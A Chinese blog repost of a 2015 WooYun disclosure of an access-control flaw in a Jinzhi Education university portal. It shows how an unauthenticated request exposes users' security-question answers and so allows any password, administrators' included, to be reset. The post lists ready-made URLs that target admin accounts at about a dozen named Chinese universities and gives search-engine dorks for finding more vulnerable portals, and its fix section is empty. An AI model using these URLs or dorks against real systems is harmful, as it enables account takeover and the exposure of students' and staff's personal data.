记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金智教育信息门户设计问题可导致重置任意用户密码(自相矛盾的设计)

2015-02-27 00:20

在一次登录校园信息门户的时候

发现了一个post请求

我给拼写成get形式

如XXX.edu.cn/userAttributesView.portal?userId=xxxx

这里以某高校为例



userId这里取portal(门户管理员)



Snap99.jpg





返回json代码

json包含该用户设置密码的邮箱、出生日期、和密保问题等信息



我们访问xx.edu.cn/getBackPassword.portal进行找回密码操作



Snap100.jpg



选择

code 区域
通过回答问题新设密码



Snap101.jpg





我们将账号和生日填上



发现匹配

Snap102.jpg





然后填写密保问题答案



Snap103.jpg





发现竟然可以修改密码



这里用一个错误的答案试试



Snap104.jpg





发现提示答案错误



由于这个是管理员账号,所以就不进行修改了

我们找一个可以登陆的账号试试



登陆后访问xx.edu.cn/userAttributesEdit.portal

查看个人信息设置

Snap105.jpg





发现设置的答案与json返回的一致

漏洞证明:

金智教育的信息门户用户比较多

这里举几例

code 区域
http://i.xmu.edu.cn/userAttributesView.portal?userId=amAdmin

http://jyxt.njmu.edu.cn/userAttributesView.portal?userId=amAdmin

http://yx.nuaa.edu.cn/userAttributesView.portal?userId=amAdmin

http://yx.urp.seu.edu.cn/userAttributesView.portal?userId=yxadmin

http://tj91.tongji.edu.cn/userAttributesView.portal?userId=amAdmin

http://student.tongji.edu.cn/userAttributesView.portal?userId=amAdmin

http://jy.gdufs.edu.cn/userAttributesView.portal?userId=admin

http://portal.uestc.edu.cn/userAttributesView.portal?userId=amAdmin

http://urp.ouc.edu.cn/userAttributesView.portal?userId=portal

http://my.njtvu.edu.cn/userAttributesView.portal?userId=portal

http://i.mju.edu.cn/userAttributesView.portal?userId=amAdmin





大多数管理员的id为amAdmin或者portal



即使找不到该userId

也可以通过其他方法来获取该校任意一名学生的学号

然后以此来重置其密码

登陆后采用

code 区域
 WooYun: 某教育门户系统漏洞可能导致大量学生信息泄露 



中的方法

获取其他人的userid

然后修改密码





厦门大学

http://i.xmu.edu.cn/userAttributesView.portal?userId=amAdmin

Snap106.jpg







南京航空



http://yx.nuaa.edu.cn/userAttributesView.portal?userId=amAdmin



Snap107.jpg







---------



东南大学



http://yx.urp.seu.edu.cn/userAttributesView.portal?userId=yxadmin



Snap108.jpg







-----------------



同济大学就业信息网

http://tj91.tongji.edu.cn/userAttributesView.portal?userId=amAdmin

Snap109.jpg







------------





电子科技大学

http://portal.uestc.edu.cn/userAttributesView.portal?userId=amAdmin

Snap110.jpg











--------------------



http://my.njtvu.edu.cn/userAttributesView.portal?userId=portal



Snap111.jpg







就举这么几个例子吧



更多可以自行构造关键字搜索



code 区域
inurl:edu.cn/getBackPasswordByQuestion.portal

inurl:index.portal intext:信息门户 site:edu.cn















修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-084779

阅读:202423 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“金智教育信息门户设计问题可导致重置任意用户密码(自相矛盾的设计)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云